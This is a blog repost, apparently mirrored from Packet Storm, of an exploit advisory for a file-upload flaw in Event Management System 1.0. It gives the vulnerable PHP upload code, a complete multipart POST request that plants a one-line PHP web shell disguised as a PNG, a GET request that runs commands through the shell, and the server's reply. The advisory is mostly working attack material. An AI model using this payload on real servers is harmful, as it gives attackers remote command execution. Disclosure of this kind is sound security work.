{"id":22109,"date":"2022-03-24T19:30:03","date_gmt":"2022-03-24T15:30:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166439\/ems10-shell.txt"},"modified":"2022-03-28T09:42:08","modified_gmt":"2022-03-28T05:12:08","slug":"event-management-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/event-management-system-1-0-shell-upload\/","title":{"rendered":"Event Management System 1.0 Shell Upload"},"content":{"rendered":"

# Title: Event Management System 1.0 Shell Upload
\n# Author: Hejap Zairy
\n# Date: 24.07.2022
\n# Vendor: https:\/\/www.sourcecodester.com\/php\/15238\/event-management-system-project-php-source-code.html
\n# Software: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/Royal%20Event.zip
\n# Reference: https:\/\/github.com\/Matrix07ksa
\n# Tested on: Windows, MySQL, Apache<\/p>\n

registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<\/p>\n

#vulnerability Code php
\nNeeds more filtering to upload profile files<\/p>\n

php“`
\nif(isset($_POST[‘submit’]))
\n{
\n$adminid=$_SESSION[‘odmsaid’];
\n$productname=$_POST[‘productName’];
\n$productimage1=$_FILES[“productimage1”][“name”];
\nmove_uploaded_file($_FILES[“productimage1”][“tmp_name”],”assets\/img\/profileimages\/”.$_FILES[“productimage1”][“name”]);
\n$sql=”update tbladmin set Photo=:productimage1 where ID=:aid”;
\n$query = $dbh->prepare($sql);
\n$query->bindParam(‘:productimage1’,$productimage1,PDO::PARAM_STR);
\n$query->bindParam(‘:aid’,$pid,PDO::PARAM_STR);
\n$query->execute();
\n$_SESSION[‘msg’]=”profile Image Updated Successfully !!”;
\n}
\n?>
\n“`<\/p>\n

[+] Payload POST<\/p>\n

“`
\nPOST \/scbs\/?p=manage_account HTTP\/1.1
\nHost: 0day.gov
\nCookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nContent-Type: multipart\/form-data; boundary=—————————409902128312379197203124536738
\nContent-Length: 882
\nOrigin: https:\/\/0day.gov
\nReferer: https:\/\/0day.gov\/scbs\/
\nUpgrade-Insecure-Requests: 1
\nTe: trailers
\nConnection: close<\/p>\n

—————————–409902128312379197203124536738
\nContent-Disposition: form-data; name=”productName”
\nHejap Zairy
\n—————————–409902128312379197203124536738
\nContent-Disposition: form-data; name=”productimage1″; filename=”0day_hejap.php”
\nContent-Type: image\/png<\/p>\n

<?=`$_GET[515]`?><\/p>\n

—————————–409902128312379197203124536738
\nContent-Disposition: form-data; name=”submit”
\n—————————–409902128312379197203124536738–
\n“`<\/p>\n

#Status: CRITICAL<\/p>\n

[+] Payload GET<\/p>\n

“`
\nGET \/Royal%20Event\/royal_event\/assets\/img\/profileimages\/0day_hejap.php?515=echo+Hejap+Zairy HTTP\/1.1<\/p>\n

Host: 0day.gov
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nConnection: close
\nCookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41
\nUpgrade-Insecure-Requests: 1<\/p>\n

“`<\/p>\n

#Response
\n“`
\nHTTP\/1.1 200 OK
\nDate: Thu, 24 Mar 2022 11:15:56 GMT
\nServer: Apache\/2.4.52 (Win64) OpenSSL\/1.1.1m PHP\/7.4.27
\nX-Powered-By: PHP\/7.4.27
\nContent-Length: 12
\nConnection: close
\nContent-Type: text\/html; charset=UTF-8<\/p>\n

Hejap Zairy
\n“`<\/p>\n

# Description:
\nThe file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<\/p>\n

# Proof and Exploit:<\/p>\n

View post on imgur.com<\/a><\/p><\/blockquote>\n